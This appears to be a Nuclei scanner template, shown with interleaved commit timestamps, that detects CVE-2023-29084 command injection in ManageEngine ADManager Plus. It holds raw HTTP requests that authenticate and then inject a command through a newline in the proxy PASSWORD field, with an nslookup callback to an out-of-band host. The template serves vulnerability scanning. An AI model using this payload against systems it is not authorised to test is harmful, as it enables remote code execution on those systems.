2023-04-18 10:03:47 +00:00
id : CVE-2023-29084
2023-04-20 18:51:53 +00:00
2023-04-18 10:03:47 +00:00
info :
name : ManageEngine ADManager Plus - Command Injection
author : rootxharsh,iamnoooob,pdresearch
severity : high
2023-04-20 18:51:53 +00:00
description : |
Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could lead to remote code execution, unauthorized access to sensitive information, or complete compromise of the target system.
2023-09-06 11:43:37 +00:00
remediation : |
Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus.
2023-04-20 18:51:53 +00:00
reference :
2023-04-18 10:03:47 +00:00
- https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
- https://community.grafana.com/t/release-notes-v6-3-x/19202
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html
- https://manageengine.com
- https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2023-29084
cwe-id : CWE-77
2024-01-14 13:49:27 +00:00
epss-score : 0.42947
epss-percentile : 0.97005
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : zohocorp
product : manageengine_admanager_plus
2024-01-14 09:21:50 +00:00
tags : cve,cve2023,packetstorm,manageengine,admanager,rce,oast,authenticated,zohocorp
2023-04-18 10:03:47 +00:00
variables :
cmd : "nslookup.exe {{interactsh-url}} 1.1.1.1"
2023-04-27 04:28:59 +00:00
http :
2023-04-18 10:03:47 +00:00
- raw :
- |
POST /j_security_check HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Referer : {{BaseURL}}
Content-Type : application/x-www-form-urlencoded
is_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator
- |
GET /home.do HTTP/1.1
Host : {{Hostname}}
- |
POST /api/json/admin/saveServerSettings HTTP/1.1
Host : {{Hostname}}
X-Requested-With : XMLHttpRequest
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
Origin : {{BaseURL}}
Referer : {{BaseURL}}
params=[{"tabId":"proxy","ENABLE_PROXY":true,"SERVER_NAME":"1.1.1.1","USER_NAME":"random","PASSWORD":"asd\r\n{{cmd}}","PORT":"80"}]&admpcsrf={{admpcsrf}}
host-redirects : true
max-redirects : 2
matchers-condition : and
matchers :
- type : word
part : body
words :
- '{"message":"'
- 'Proxy Settings'
condition : and
- type : word
part : interactsh_protocol
words :
- "dns"
extractors :
- type : kval
name : admpcsrf
2023-07-11 19:49:27 +00:00
internal : true
2023-04-18 10:03:47 +00:00
kval :
- admpcsrf
2023-07-11 19:49:27 +00:00
part : header
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502203d4267897f8296511f8a494c98475544751d5e880161faac63cd9f8347147138022100b73532c3e610715de5695219c06e52f99a1fd1e60301f7cf8f259ddb5fb352f1:922c64590222798bb761d5b6d8e72950